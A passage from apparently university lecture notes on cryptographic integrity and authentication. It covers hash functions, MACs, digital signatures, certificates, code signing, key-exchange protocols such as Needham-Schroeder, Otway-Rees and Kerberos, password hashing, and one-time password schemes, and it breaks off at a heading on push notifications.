However, cryptographic hash functions differ from standard hash functions in that they generate significantly longer outputs—typically 224, 256, 384, or 512 bits. Strong cryptographic hash functions, such as SHA-2 and SHA-3 families, must exhibit several essential properties:

  1. Fixed-Length Output – Like all hash functions, cryptographic hash functions take an input of arbitrary length and produce a fixed-size output.

  2. Deterministic – They always produce the same hash for the same input, ensuring consistency

  3. Pre-image Resistance (Hiding) – Given a hash value H, it should be computationally infeasible to determine the original input M such that H = hash(M).

  4. Avalanche Effect – The output of a hash function should not give any information about any part of the input. Small changes in the input should result in significantly different hash outputs, preventing any predictable relationship between input and output. For example, changing a byte in the message should result in a completely different hash result, with no ability to predict which bits would flip. The avalanche effect is the rsult of good diffusion.

  5. Collision Resistance – While hash collisions must theoretically exist (due to the pigeonhole principle), it should be infeasible to find two distinct inputs that produce the same hash. Likewise (see item 4, above), modifying a message should alter the hash in an unpredictable way.

  6. Efficient – Hash functions should be computationally efficient, allowing rapid generation of hashes for applications like message integrity verification without excessive overhead.

Cryptographic hash functions form the foundation of message authentication codes (MACs) and digital signatures, playing a crucial role in ensuring data integrity and authentication.

Due to their properties, we can be highly confident that even the smallest modification to a message will produce a completely different hash. However, the “holy grail” for an attacker is finding a way to create a different, but useful, message that hashes to the same value as a legitimate one. Such an attack could allow message substitution, potentially leading to serious consequences—such as redirecting a financial transaction.

Finding a collision for a specific, known message (pre-image attack) is significantly harder than finding any two different messages that hash to the same value (collision attack). The birthday paradox explains why: the probability of finding any collision is approximately proportional to the square root of the total number of possible hashes. As a result, the security strength of a hash function against brute-force collision attacks is roughly half the number of bits in the hash output. For example, a 256-bit hash function provides approximately 128-bit security against such attacks.

Common cryptographic hash functions include:

  • SHA-1 (160-bit output) – now considered weak due to known vulnerabilities.
  • SHA-2 (e.g., SHA-256, SHA-512) – widely used and considered secure.
  • SHA-3 (e.g., SHA3–256, SHA3–512) – designed as a secure alternative to SHA-2.

Message Authentication Codes (MACs)

A cryptographic hash function helps ensure message integrity by acting as a checksum, allowing detection of any modifications to a message. If a message is altered, its hash will change. However, standard hashes alone do not provide authentication—an attacker could modify both the message and its hash without detection. To address this, we use a cryptographic hash that incorporates a secret key, creating a message authentication code (MAC). Only those who possess the key can generate or verify a valid MAC.

There are two main types of MACs: hash-based and block cipher-based.

Hash-Based MAC (HMAC):
An HMAC transforms a cryptographic hash function (e.g., SHA-256) into a MAC by incorporating a secret key. The message and key are processed together, ensuring that only someone with the correct key can generate or verify the MAC. Without knowledge of the key, an attacker cannot forge a valid MAC, even if they can see previous message-MAC pairs.

Block Cipher-Based MAC (CBC-MAC):
Cipher Block Chaining (CBC) mode ensures that each encrypted block depends on all previous blocks. CBC-MAC leverages this by initializing encryption with a zero initialization vector (IV), encrypting the message in CBC mode, and using only the final encrypted block as the MAC. Any modification to the message propagates through the encryption process, altering the final block and invalidating the MAC.

While CBC-MAC produces a fixed-length result similar to a hash function, it relies on symmetric encryption rather than a hash function for security. Unlike HMAC, its security depends on the underlying block cipher and requires careful handling to prevent certain attacks (e.g., misuse with variable-length messages).

Digital signatures

Message authentication codes (MACs) rely on a shared secret key, meaning that anyone with the key can generate or verify a MAC. However, this does not guarantee that the original author of the message was the one who signed it—any key holder can modify and re-sign the message.

Digital signatures provide stronger guarantees than MACs:

  1. Only the original signer can generate a valid signature, but anyone can verify it.
  2. Signatures are message-specific—copying a signature to a different message invalidates it.
  3. Forgery is infeasible, even if an attacker has seen numerous signed messages.

A digital signature system consists of three fundamental operations:

  1. Key generation: {private_key, verification_key } := gen_keys(keysize)
    Generates a key pair: a private key for signing and a public verification key for validation.
  2. Signing: signature := sign(message, private_key)
    Creates a digital signature using the private key.
  3. Validation: isvalid := verify(message, signature, verification_key)
    Checks whether a signature is valid using the public verification key.

Signing hashes instead of messages

Since cryptographic hashes are designed to be collision-resistant, it is common practice to sign the hash of a message rather than the message itself. This approach ensures that:

  • The signature is small and fixed in size, regardless of message length.
  • The signature is efficient to compute and verify.
  • It integrates seamlessly into data structures that need them.
  • It creates minimal transmission or storage overhead.

There are several commonly used digital signature algorithms:

DSA, the Digital Signature Algorithm
The current NIST standard, based on the difficulty of computing discrete logarithms.
ECDSA, Elliptic Curve Digital Signature Algorithm
A variant of DSA that uses elliptic curve cryptography (ECC), providing equivalent security with smaller key sizes than traditional DSA.
Public key cryptographic algorithms
Uses RSA encryption principles to sign message hashes. Unlike DSA and ECDSA, which are dedicated signature schemes, RSA is a general-purpose public-key cryptosystem that can be used for both encryption and signing.

All these algorithms use public and private key pairs.

We previously saw how public-key cryptography allows encryption:

  • Alice encrypts a message with Bob’s public key, ensuring that only Bob can decrypt it with his private key.

Digital signatures work in a similar way, but in reverse:

  • Alice “encrypts” (signs) a message hash using her private key.
  • Anyone with Alice’s public key can decrypt and verify the signature, confirming that the message was signed by Alice.

Instead of encrypting the entire message, most digital signature algorithms apply a hash function first, then sign the hash using a trapdoor function (such as modular exponentiation in RSA or ECC operations in ECDSA). This ensures that only the signer can generate a valid signature, but anyone can verify it using the public key.

Unlike MACs, digital signatures provide non-repudiation—proof that a specific entity signed a message. Alice cannot deny creating a signature, as only her private key could have produced it.

Both MACs and digital signatures provide message integrity, ensuring that the message has not been altered. However, digital signatures go further by allowing anyone to verify authenticity without requiring a shared secret key.

Property Message Authentication Codes (MACs) Digital Signatures
Key Type Shared secret key Public-private key pair
Who Can Sign? Anyone with the key Only the private key holder
Who Can Verify? Only those with the key Anyone with the public key
Non-Repudiation No (any key holder can generate a MAC) Yes (only the private key holder can sign)
Integrity Proof Yes Yes
Publicly Verifiable? No (requires the secret key) Yes

Covert and authenticated messaging

We ignored the encryption of a message in the preceding discussion; our interest was assuring integrity. However, there are times when we may want to keep the message secret and validate that it has not been modified. Doing this involves sending a signature of the message along with the encrypted message.

A basic way for Alice to send a signed and encrypted message to Bob is for her to use hybrid cryptography and:

  1. Create a signature of the message. This is a hash of the message encrypted with her private key.
  2. Create a session key for encrypting the message. This is a throw-away key that will not be needed beyond the communication session.
  3. Encrypt the message using the session key. She will use a fast symmetric algorithm to encrypt this message.
  4. Package up the session key for Bob: she encrypts it with Bob’s public key. Since only Bob has the corresponding private key, only Bob will be able to decrypt the session key.
  5. She sends Bob: the encrypted message, encrypted session key, and signature.

Anonymous identities

A signature verification key (e.g., a public key) can be treated as an identity. You possess the corresponding private key and therefore only you can create valid signatures that can be verified with the public key. This identity is anonymous; it is just a bunch of bits. There is nothing that identifies you as the holder of the key. You can simply assert your identity by being the sole person who can generate valid signatures.

Since you can generate an arbitrary number of key pairs, you can create a new identity at any time and create as many different identities as you want. When you no longer need an identity, you can discard your private key for that corresponding public key.

Identity binding: digital certificates

While public keys provide a mechanism for asserting integrity via digital signatures, they are themselves anonymous. We’ve discussed a scenario where Alice uses Bob’s public key but never explained how she can assert that the key really belongs to Bob and was not planted by an adversary. Some form of identity binding of the public key must be implemented for you to know that you really have my public key instead of someone else’s. How does Alice really know that she has Bob’s public key?

X.509 digital certificates provide a way to do this. A certificate is a data structure that contains user information (called a distinguished name) and the user’s public key. This data structure also contains a signature of the certification authority. The signature is created by taking a hash of the rest of the data in the structure and encrypting it with the private key of the certification authority. The certification authority (CA) is responsible for setting policies of how they validate the identity of the person who presents the public key for encapsulation in a certificate.

To validate a certificate, you would hash all the certificate data except for the signature. Then you would decrypt the signature using the public key of the issuer. If the two values match, then you know that the certificate data has not been modified since it has been signed. The challenge is how to get the public key of the issuer. Public keys are stored in certificates, so the issuer would have a certificate containing its public key. This certificate can be signed by yet another issuer. This kind of process is called certificate chaining. For example, Alice can have a certificate issued by the Rutgers CS Department. The Rutgers CS Department’s certificate may be issued by Rutgers University. Rutgers University’s certificate could be issued by the State of New Jersey Certification Authority, and so on. At the very top level, we will have a certificate that is not signed by any higher-level certification authority. A certification authority that is not underneath any other CA is called a root CA. In practice, this type of chaining is rarely used. More commonly, there are hundreds of autonomous certification authorities acting as root CAs that issue certificates to companies, users, and services. The certificates for many of the trusted root CAs are preloaded into operating systems or, in some cases, browsers. See here for Microsoft’s trusted root certificate participants and here for Apple’s trusted root certificates.

Every certificate has an expiration time (often a year or more in the future). This provides some assurance that even if there is a concerted attack to find a corresponding private key to the public key in the certificate, such a key will not be found until long after the certificate expires. There might be cases where a private key might be leaked or the owner may no longer be trustworthy (for example, an employee leaves a company). In this case, a certificate can be revoked. Each CA publishes a certificate revocation list, or CRL, containing lists of certificates that they have previously issued that should no longer be considered valid. To prevent spoofing the CRL, the list is, of course, signed by the CA. Each certificate contains information on where to obtain revocation information.

The challenge with CRLs is that not everyone may check the certificate revocation list in a timely manner and some systems may accept a certificate not knowing that it was revoked. Some systems, particularly embedded systems, may not even be configured to handle CRLs.

Code signing - protecting code integrity

We have seen how hash functions are used for message integrity through message authentication codes (MACs) (which rely on a shared key) and digital signatures (which use public and private keys). The same cryptographic principles apply to code signing, a process that ensures software has not been modified since it was created by the developer.

Code signing protects against tampered or malicious software. It allows operating systems to verify software authenticity, detect unauthorized modifications, and prevent execution of compromised applications—all without requiring users to manually inspect their downloads.

Signing software allows it to be downloaded from untrusted sources or distributed over untrusted channels while still ensuring it has not been altered. It also enables the detection of malware that may have modified software after installation.

Modern operating systems such as Microsoft Windows, Apple macOS, iOS, and Android extensively use code signing to validate software authenticity and integrity.

Code signing process

  1. Key Pair Generation – The software publisher generates a public/private key pair.
  2. Certificate Issuance – The public key is included in a digital certificate, typically issued by a Certificate Authority (CA) that verifies the publisher’s identity.
  3. Hash Generation – The publisher computes a cryptographic hash of the software.
  4. Signature Creation – The hash is encrypted with the private key, producing a digital signature.
  5. Attaching the Signature – The signature and the certificate are embedded in the software package to allow verification.

Code verification process

  1. Certificate Validation – Before installation, the system checks the certificate’s validity by ensuring it was issued by a trusted CA and has not been revoked or expired.
  2. Hash Computation – The system generates a new hash from the downloaded software.
  3. Signature Decryption – The digital signature is decrypted using the publisher’s public key, revealing the original hash.
  4. Integrity Check – The system compares the decrypted hash with the newly computed hash. If they match, the software is authentic and unmodified. If they do not match, this indicates tampering or corruption, and the software may be rejected as untrusted.

Some signed software, particularly system-critical applications, also supports per-page hashing. In demand paging, an operating system loads only the necessary portions (pages) of a program into memory as needed rather than loading the entire executable at once. Instead of verifying a large file before execution, per-page hashing allows each 4KB page to be individually validated upon loading. This ensures integrity at runtime, helping detect in-memory modifications or tampering even after installation.

Authentication

Authentication is the process of verifying that a user’s claimed identity is legitimate.

It is important to distinguish authentication from identification:

  • Identification is the act of claiming an identity (e.g., entering a username or presenting an ID).
  • Authentication is the process of proving that the claimed identity is valid (e.g., by providing a correct password, fingerprint, or security token).

Authorization is a separate process that determines what actions or resources an authenticated user is permitted to access.

Authentication factors

The three factors of authentication are:

  1. something you have – a physical object, such as a key, smart card, or security token.
  2. something you know – a secret, such as a password, PIN, or security answer.
  3. something you are – a biological trait, such as a fingerprint, retina scan, or facial recognition.

Using multi-factor authentication (MFA) enhances security by requiring authentication from two or more different factors. This ensures that even if one factor is compromised, unauthorized access remains difficult.

Importantly, MFA requires factors from different categories. Using two passwords or two security questions does not qualify as multi-factor authentication because both fall under “Something You Know.”

Combined authentication and key exchange protocols

Key exchange and authentication using a trusted third party

When two parties want to communicate securely using symmetric encryption, they need to share a common key. There are three primary ways to achieve this:

  1. Pre-shared Key Exchange – The key is exchanged outside the network using a secure method, such as reading it over the phone or physically delivering it on a flash drive.
  2. Public Key Cryptography – The key is securely exchanged using asymmetric encryption (e.g., RSA or Diffie-Hellman).
  3. Trusted Third Party (TTP) Key Exchange – A centralized authority manages and distributes keys to authenticated users.

A trusted third party (TTP) is a system that securely holds each participant’s secret key. In this model, Alice and the TTP (Trent) share Alice’s secret key. Likewise, Bob and Trent share Bob’s secret key.

The simplest way of using a trusted third party is to ask it to come up with a session key and send it to the parties that wish to communicate. For example:

  1. Alice requests a session key from Trent to communicate with Bob. This request is encrypted with Alice’s secret key, ensuring that Trent knows it came from Alice.
  2. Trent generates a random session key and encrypts it into two messages: One copy is encrypted with Alice’s secret key. Another copy is encrypted with Bob’s secret key.
  3. Trent sends both encrypted versions to Alice. Alice decrypts her copy to obtain the session key. She then forwards the encrypted session key meant for Bob to Bob.
  4. Bob decrypts his copy using his secret key. Now both Alice and Bob share the session key for secure communication.

This simple scheme is vulnerable to replay attacks. An eavesdropper, Eve, can record messages from Alice to Bob and replay them at a later time. Eve might not be able to decode the messages but she can confuse Bob by sending him seemingly valid encrypted messages.

The second problem is that Alice sends Trent an encrypted session key but Trent has no idea that Alice is requesting to communicate with him. While Trent authenticated Alice (simply by being able to decrypt her request) and authorized her to talk with Bob (by generating the session key), that information has not been conveyed to Bob. This problem can be solved by having Trent package information about the other party within the encrypted messages that contain the session key.

Needham-Schroeder: nonces

The Needham-Schroeder protocol improves the basic key exchange protocol by adding nonces to messages. A nonce is simply a random string – a random bunch of bits that are used to prevent replay attacks.

Step 1. Alice Requests a Session Key from Trent

Alice sends a request to Trent (the TTP), asking to establish communication with Bob. She includes a random nonce (NA) to ensure freshness of the message. Note that this request does not need to be encrypted

Step 2. Trent Responds with a Secure Session Key

Trent generates a random session key (KAB) for Alice and Bob and sends Alice the following, encrypted with Alice’s secret key:

  • Alice’s ID
  • Bob’s ID
  • Alice’s nonce, NA
  • the session key, KAB
  • a ticket: a message encrypted for Bob that contains Alice’s ID and the same session key (KAB)

This entire message from Trent is encrypted with Alice’s secret key.

Step 3. Alice Validates the Message and Forwards the Ticket to Bob

Alice decrypts Trent’s response using her secret key and verifies that the nonce matches her original request, ensuring it’s not a replay attack.

She then forwards the ticket (which is encrypted for Bob and unreadable to her) to Bob.

Step 4: Bob Validates the Ticket and Extracts the Session Key

Bob decrypts the ticket using his secret key and learns:

  • The session key (KAB).
  • That he is communicating with Alice, as her ID is in the ticket.
  • That the session key was generated by Trent, since only Trent knows Bob’s secret key and could have created the ticket.

Step 5: Bob Authenticates Alice

Bob now needs to confirm that Alice actually has the session key. He does this by sending Alice a challenge-response authentication:

  1. Bob generates a random nonce (NB), encrypts it with the session key (KAB), and sends it to Alice.
  2. Alice decrypts the nonce, subtracts 1, then encrypts the result with KAB and sends it back to Bob.
  3. Bob verifies that the returned value is (NB - 1), proving that Alice knows the session key.

At this point, both Alice and Bob have authenticated each other and share a secure session key for further communication.

Denning-Sacco Modification: Using Timestamps to Prevent Key Replay Attacks

A major flaw in the Needham-Schroeder protocol is its vulnerability to key replay attacks. This occurs when an attacker, Eve, captures a valid ticket. (the message from Trent that is encrypted for Bob and contains the session key) and replays it later to impersonate Alice.

How the Attack Works:

Step 1. Alice initiates a communication session with Bob by sending a ticket encrypted for Bob.

Step 2. The ticket contains:

  • Alice’s ID
  • Session key (KAB)

Step 3. If Eve manages to capture and later decrypt the session key (perhaps through cryptanalysis or a key compromise), she can replay the ticket to Bob.

Step 4. Since Bob has no way to distinguish between an old ticket and a new one, he accepts the session key and proceeds with authentication.

Step 5. Eve, now in possession of KAB, successfully authenticates as Alice and communicates with Bob, who mistakenly believes he is talking to Alice.

To mitigate this attack, Denning & Sacco proposed a simple but effective fix: include a timestamp inside the ticket when it is generated by Trent (the trusted third party):

  • When Trent creates the ticket that Alice will later forward to Bob, he encrypts it using Bob’s secret key and includes:

  • Alice’s ID

  • Session key (KAB)

  • A timestamp (TA)

  • When Bob receives the ticket, he checks the timestamp. If the timestamp is too old (e.g., outside an acceptable time window), Bob rejects the ticket, assuming it is a replay attack. If the timestamp is recent, Bob proceeds with authentication.

This fix works because old tickets cannot be reused – a previously captured ticket after the time window has expired.

Otway-Rees Protocol: Session IDs Instead of Timestamps

One challenge with the Denning-Sacco modification is that it relies on synchronized clocks across all entities. If Bob’s clock is significantly out of sync with Trent’s, he might:

  • Falsely accept an old ticket, leading to a replay attack.
  • Falsely reject a valid ticket, disrupting communication.

An attacker (Eve) could manipulate time synchronization by:

  • Injecting fake NTP (Network Time Protocol) responses to mislead Bob’s system clock.
  • Generating fake GPS signals to deceive devices relying on GPS for time synchronization.

Since time synchronization itself introduces vulnerabilities, the Otway-Rees protocol replaces timestamps with session IDs to prevent replay attacks without relying on clocks.

The steps in this protocol are:

Step 1: Alice Initiates a Communication Request

Alice sends a message to Bob that includes:

  • A unique session ID (S) to track this exchange.
  • Both Alice’s and Bob’s IDs (to establish who is communicating).
  • A message encrypted with Alice’s secret key, containing:
    • Alice’s and Bob’s IDs.
    • A random nonce, r1.
    • The session ID (S) (ensuring it matches throughout the exchange).

Step 2: Bob Forwards the Request to Trent (Trusted Third Party)

Bob receives Alice’s message and sends Trent:

  • Alice’s original message.
  • A message encrypted with Bob’s secret key, containing:
    • Alice’s and Bob’s IDs** (confirming he agrees to communicate with Alice).
    • A random nonce, r2.
    • The same session ID (S).

Now, Trent sees the same session ID in both encrypted messages, proving:

  • Alice initiated the request to talk to Bob.
  • Bob agrees to talk to Alice.
  • It really is Bob because Bob was able to create a message containing the session ID and encrypt it with his secret key.

Step 3: Trent Generates and Distributes the Session Key

Once Trent verifies the request, he:

  • Generates a random session key (KAB) for Alice and Bob.
  • Encrypts KAB along with Alice’s nonce, r1, for Alice using Alice’s secret key.
  • Encrypts KAB along with Bob’s nonce, r2, for Bob using Bob’s secret key.
  • Sends both encrypted session keys to Bob, along with the session ID (S).

Bob then forwards Alice’s encrypted key to her.

The Otway-Rees protocol is secure because:

  • It prevents replay attacks: Even if an attacker replays an old message, the session ID must match in all encrypted exchanges.
  • Does not require synchronized clocks: Eliminates the risk of time-based attacks.
  • Ensures mutual agreement: Trent confirms that both Alice and Bob want to communicate.
  • Incorporates nonces: Trent’s response includes nonces to prevent an attacker from injecting old session keys (even if they are cracked). The use of nonces ensures that there is no replay attack on Trent’s response even if an attacker sends a message to Bob with a new session ID and old encrypted session keys (that were cracked by the attacker).

Kerberos

Kerberos is a trusted authentication, authorization, and key exchange protocol that uses symmetric cryptography. It is based on the Needham-Schroeder protocol, incorporating the Denning-Sacco modification (timestamps) to prevent replay attacks.

When Alice wants to communicate securely with Bob (who may be another user or a service), she must first request access from Kerberos. If authorized, Kerberos provides her with two encrypted messages:

  1. A message encrypted with Alice’s secret key, containing:
    • A session key (KAB) for secure communication with Bob.
  2. A ticket encrypted with Bob’s secret key (which Alice cannot read), containing:
    • The same session key (KAB).

Alice forwards the ticket to Bob. When Bob decrypts it using his secret key, he:

  • Confirms that Kerberos issued the ticket since only Kerberos knows his secret key.
  • Obtains KAB, which he shares with Alice.

Now that both Alice and Bob have the session key, they can securely communicate by encrypting messages using KAB.

Preventing Replay Attacks: Mutual Authentication

To ensure that Alice is legitimate, she must prove she can extract the session key sent by Kerberos. She does this by:

  1. Generating a new timestamp (TA).
  2. Encrypting TA with KAB and sending it to Bob.

Bob verifies that the timestamp is recent and then authenticates himself to Alice by:

  1. Incrementing TA by 1.
  2. Encrypting the modified value with KAB and sending it back to Alice.

Since only Bob could have decrypted TA and modified it, Alice knows she is talking to the real Bob.

Avoiding frequent password prompts

Without optimization, Alice would need to enter her password every time she requests a service, since her secret key is needed to decrypt the session key for each request. Caching her key in a file would be a security risk.

To solve this, Kerberos is divided into two components:

  1. Authentication Server (AS):
  • Handles initial user authentication.
  • Issues a session key for Alice to communicate with the Ticket Granting Server (TGS).
  • This session key can be cached, avoiding repeated password entry.
  1. Ticket Granting Server (TGS):
  • Handles requests for services (e.g., accessing Bob’s server).
  • Issues a new session key for Alice’s communication with the specific service.
  • Provides a ticket, which Alice presents to the service instead of entering credentials again.

Authentication Protocols

In the next family of protocols, we will look at mechanisms that focus only on authentication and not key exchange.

Public key authentication

Public key authentication is based on the use of nonces (random values) to verify that a party possesses a specific private key—without ever revealing that key. This process is conceptually similar to the challenge-response mechanism used in the Needham-Schroeder protocol.

If Alice wants to authenticate Bob, she must verify that Bob possesses his private key. Since private keys are never shared, Alice uses a challenge-response mechanism:

  1. Alice generates a nonce (a random value) and sends it to Bob as a challenge.
  2. Bob encrypts the nonce using his private key and sends the result back to Alice.
  3. Alice decrypts Bob’s response using Bob’s public key:
    • If the decrypted value matches the original nonce, Alice confirms that Bob must have the corresponding private key.
    • Since only Bob should possess his private key, Alice can trust that she is communicating with the real Bob.

For mutual authentication, Bob must also verify Alice’s identity. Instead of each party individually initiating a challenge-response cycle, they can combine their authentication steps into a single exchange, making the process more efficient:

  1. Alice and Bob generate their own nonces (NA and NB).
  2. Alice sends Bob her nonce (NA).
  3. Bob encrypts NA using his private key and also sends Alice his own nonce (NB).
  4. Alice decrypts Bob’s response using Bob’s public key. If the decrypted value matches NA, Alice confirms Bob’s identity.
  5. Alice encrypts NB with her private key and sends it back to Bob.
  6. Bob decrypts Alice’s response using Alice’s public key. If the decrypted value matches NB, Bob confirms Alice’s identity.

At this point, both Alice and Bob have authenticated each other, completing mutual authentication in just one additional round-trip message instead of two separate exchanges.

Note that you can create variations of the protocol. For instance, Alice can send Bob her nonce encrypted with Bob’s public key so that only he can decode it.

Regardless of the variation, the idea is for one party to prove that they can use their private key (which nobody else has) to encode or decode something that the other party sends them.

Incorporating X.509 Certificates for Identity Verification

While public key authentication proves that an entity possesses a private key, it does not inherently verify the entity’s identity. An attacker could generate their own key pair and falsely claim to be Bob. To address this, X.509 certificates bind public keys to specific identities.

An X.509 certificate, issued by a trusted Certificate Authority (CA), contains:

  • The entity’s public key.
  • The entity’s identity (such as a domain name, email, or organizational details).
  • The CA’s digital signature, proving the certificate’s authenticity.

Before using Bob’s public key, Alice can first request and verify Bob’s X.509 certificate, ensuring:

  • The certificate is issued by a trusted CA.
  • The certificate has not expired or been revoked.
  • The entity information in the certificate matches Bob’s claimed identity.

If Bob’s certificate is valid, Alice can confidently use Bob’s public key, mitigating the risk of impersonation. This approach is widely used in TLS (Transport Layer Security) to secure web communications, where websites present certificates to allow users to verify their authenticity.

Password Authentication Protocol (PAP)

The most basic form of authentication relies on reusable passwords, known as the Password Authentication Protocol (PAP).

  1. The system prompts the user to identify themselves (e.g., entering a login name).
  2. The user enters their password.
  3. If the password matches the one stored for that login, authentication is successful.

While simple, PAP is vulnerable to attacks such as password guessing, brute force, and credential leaks.

While simple, PAP is vulnerable to attacks such as password guessing, brute force, and credential leaks.

Password guessing defenses

To avoid having an adversary carry out a password-guessing attack, we need to make it not feasible to try a large number of passwords. A common approach is to rate-limit guesses. When the system detects an incorrect password, it will wait several seconds before allowing the user to try again. Linux, for example, waits about three seconds. After five bad guesses, it terminates and restarts the login process.

Another approach is to completely disallow password guessing after a certain number of failed attempts by locking the account. This is common for some web-based services, such as banks. However, the system has now been made vulnerable to a denial-of-service (DoS) attack. An attacker may not be able to take your money but may inconvenience you by disallowing you to access it as well.

Hashed passwords

A major weakness of the Password Authentication Protocol (PAP) is that if an attacker gains access to the password file, they obtain all user credentials. To mitigate this risk, systems store hashed passwords instead of plaintext passwords.

Instead of storing actual passwords, the system stores their cryptographic hashes, taking advantage of the one-way property of hash functions:

  1. When a user enters a password, the system computes: hash(password).
  2. The system compares the computed hash with the stored hash.
  3. If they match, authentication is successful.

Since hashes cannot be reversed, an attacker who steals the password file cannot directly recover the original passwords—they must resort to brute-force or dictionary attacks:

  1. Brute-Force Attacks: An attacker systematically tries every possible password until they find one that matches a stored hash.

  2. Dictionary Attacks: Instead of trying all possible combinations, an attacker tests common passwords (e.g., dictionary words, known passwords, common letter-number substitutions).

  3. Precomputed Hash Attacks (Rainbow Tables): Attackers can precompute hashes of millions of common passwords and store them in a lookup table. If a system-stored hash matches one in the table, the attacker immediately knows the corresponding password. This makes cracking many passwords at once much faster.

Salting to Prevent Precomputed Attacks

To prevent attackers from using precomputed hashes, systems introduce a random value called a “salt” when hashing passwords.

Before hashing, the system concatenates the password with a unique salt: hash(salt + password). The salt is stored in plaintext alongside the hashed password in the database (the password file). Even if two users have the same password, their hashes will be different due to different salts.

Why Salt is Effective:

  • Defeats rainbow table attacks – Attackers would need to precompute an entire hash table for each possible salt value, making the approach infeasible.
  • Prevents identical hashes for identical passwords – Even if multiple users have the same password, their stored hashes will be different, so an attacker cannot tell whether users share the same password.
  • Forces attackers to crack passwords individually – Instead of applying a single precomputed attack to all users, an attacker must brute-force each password separately, increasing computational cost.

Spraying and Stuffing attacks

Password Spraying:
Password spraying is an attack where an attacker tries a small number of common passwords (e.g., “123456” or “password”) across a large number of accounts. Unlike brute force attacks that target a single account with multiple passwords, password spraying avoids detection by limiting the number of attempts per account, making it harder for security systems to flag the activity.
Credential Stuffing:
Credential stuffing is an attack where attackers use a large list of previously leaked or stolen username and password combinations to try logging into various systems. Since many users reuse passwords across multiple services, attackers rely on these credentials working for other accounts. Automated tools are often used to test the credentials on multiple platforms quickly.

Password recovery options

Passwords are bad. They are not incredibly secure. English text has a low entropy (approximately 1.2–1.5 bits per character) and are often easy to guess. Password files from some high-profile sites have been obtained to validate just how bad many people are at picking passwords. Over 90% of all user passwords sampled are on a list of the top 1,000 passwords. The most common password is password. People also tend to reuse passwords. If an attacker can get passwords from one place, there is a good chance that many will work with other services.

Despite many people picking bad passwords, people often forget them, especially when they are trying to be good and use different passwords for different accounts. There are several common ways of handling forgotten passwords, none of them great:

Email them:
This used to be a common solution and should be dying off. It requires that the server stores the password, which means it is not stored as a hash. This exposes the risk that anyone seeing your email will see your password.
Reset them:
This is more common but requires authenticating the requestor to avoid a denial of service attack. The common thing to do is to send a password reset link to an email address entered when the account was created. We again have the problem that if someone has access to your mail, they will have access to the password reset link and can create a new password for your account. In both these cases, we have the problem that users may no longer have the same email address. Think of the people who switched from Comcast to get Verizon FiOS and switched their comcast.net addresses to verizon.net (note: avoid using email addresses tied to services or locations that you might change).
Provide hints:
This is common for system logins (e.g. macOS and Windows). However, a good hint may weaken the password or may not help the user.
Ask questions:
It is common for sites to ask questions (“what was your favorite pet’s name?”, “what street did you live on when you were eight years old?”). The answers to many of these questions can often be found through a bit of searching or via social engineering. A more clever thing is to have unpredictable answers (“what was your favorite pet’s name?” “Osnu7$Qbv999”) but that requires storing answers somewhere.
Rely on users to write them down:
This is fine as long as the thread model is electronic-only and you don’t worry about someone physically searching for your passwords.

One-time Passwords (OTPs)

The other problem with reusable passwords is that if a network is insecure, an eavesdropper may sniff the password from the network. A potential intruder may also simply observe the user typing a password. To thwart this, we can turn to one-time passwords. If someone sees you type a password or gets it from the network stream, it won’t matter because that password will be useless for future logins.

There are three forms of one-time passwords:

  1. Sequence-based. Each password is a function of the previous password. S/Key is an example of this.

  2. Challenge-based. A password is a function of a challenge provided by the server. CHAP is an example of this.

  3. Time-based or Sequence-based. Each password is a function of the time. TOTP and RSA’s SecurID are examples of this.

Sequence-based: S/Key

S/Key authentication is a one-time password (OTP) system that generates a sequence of passwords using a one-way function. Each password in the sequence is derived from the previous one, ensuring that passwords are used in reverse order for authentication.

  1. A user or administrator selects an initial secret (the seed).
  2. A one-way function f is repeatedly applied to generate a sequence of passwords: password[n] = f(password[n−1])
  3. The system stores only the final computed password: password[N].
  4. Each time the user authenticates, they provide the next password in the reverse sequence:
    • The first authentication uses password[N−1].
    • The second authentication uses password[N−2].
    • This continues until all passwords in the list are used.

Challenge-based: CHAP

The Challenge-Handshake Authentication Protocol (CHAP) is an authentication mechanism that allows a server to verify a user’s identity without transmitting the password over the network.

CHAP is based on a shared secret (essentially a password) that both the client and server know. Authentication follows these steps:

  1. Challenge: The server generates a random nonce (a unique random value), called a challenge and sends it to the client.
  2. Response: The client computes a hash of the shared secret combined with the nonce and sends the result back to the server.
  3. Verification: The server performs the same hash calculation using its stored copy of the shared secret. If the computed hash matches the one sent by the client, authentication succeeds. Otherwise, authentication fails.

With CHAP:

  • The password is never transmitted, only a hash of the password with a random challenge. An intruder that sees this hash cannot extract the original data.
  • Since the challenge (nonce) changes for each authentication attempt, an attacker cannot reuse an old response.

Challenge-based: Passkeys

Passkey authentication is a modern implementation of public key authentication designed to eliminate the need for passwords. Instead of relying on traditional credentials, passkeys use cryptographic public-private key pairs to authenticate users securely.

Enrollment

  1. The user logs into a service using a legacy authentication method (e.g., username-password, OTP, or SMS verification).
  2. The user’s device generates a unique public-private key pair for that specific service.
  3. The public key is sent to the service and stored with the user’s account, replacing the need for a password.
  4. The private key remains securely stored on the user’s device.

Authentication (login)

  1. The user provides their username to the service.
  2. The server generates a random challenge (at least 16 bytes long) and sends it to the user.
  3. The user’s device retrieves the private key associated with the service. This might use on-device biometric authentication (Face ID, Touch ID), a device PIN, or an on-device password. The user’s device then uses the private key to digitally sign the challenge.
  4. The signed response is sent back to the service.
  5. The service retrieves the user’s public key, which was stored during enrollment.
  6. It verifies the digital signature against the challenge. If the signature is valid, the server confirms that the user possesses the corresponding private key and grants access.

Time-based: TOTP

TOTP (Time-based One-Time Password) is a widely used authentication method that generates a temporary code based on a shared secret key and the current time.

It applies an HMAC (Hash-based Message Authentication Code) function using the secret key and a time-based counter, typically in 30-second intervals. The server independently computes the expected OTP using the same key and time window, allowing authentication if the values match. Since TOTP codes expire quickly, they provide strong protection against replay attacks.

TOTP is often used as a second factor (proof that you have some device with the secret configured in it) in addition to a password. The protocol is widely supported by companies such as Amazon, Dropbox, WordPress, Microsoft, and Google.

Counter-based: HOTP

HOTP (HMAC-based One-Time Password) generates one-time passwords using a shared secret and an incrementing counter. It is essentially the same as TOTP except that it uses a counter instead of the current time.

Each time an authentication attempt is made, the counter advances on both the client and server to ensure the password is not reused.

Unlike TOTP, HOTP does not expire after a set time, making it more vulnerable to replay attacks but eliminating the need for time synchronization. It is defined in RFC 4226 and is commonly implemented in hardware tokens like YubiKey for MFA (Multi-Factor Authentication).

Since HOTP is not time-based, users can enter a code at any time before the next one is generated. However, it requires keeping counters synchronized between the client and the service.

Push notifications

Push notifications rely on sending a notification via phone-based SMS messaging (or sometimes email) to validate that a user is in possession of their device (the “something you have” factor). They are often used as a second factor in multi-factor authentication.

Second Factor Authentication with Push Notifications:
